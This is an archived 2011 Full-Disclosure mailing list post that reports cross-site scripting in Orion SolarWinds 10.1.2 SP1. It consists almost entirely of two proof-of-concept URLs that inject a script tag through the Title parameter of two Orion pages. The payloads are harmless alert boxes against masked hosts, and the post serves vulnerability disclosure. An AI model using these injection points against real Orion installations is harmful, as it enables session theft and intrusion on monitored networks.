| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAKMw8VVt_pwswKmX_19CZDEzV91-pMRwgdtjxLSxdKQSB4r=ug@mail.gmail.com> Date: Mon, 12 Sep 2011 11:45:32 -0300 From: Gustavo <gustavorobertux@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Orion SolarWinds XSS attack Software : Orion SolarWinds 10.1.2 - SP1 XSS ----------------------------------------------------------------------------------------------------------------------------------------------------------------- http://orion.xxx.xxx/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E http://orion.xxx.xxx/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813 f-231270=0225b7.OrionMap&Title=%3Cscript%3EALERTA%28%27test%27%29%3C/scri pt%3E ----------------------------------------------------------------------------------------------------------------------------------------------------------------- Cya ! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists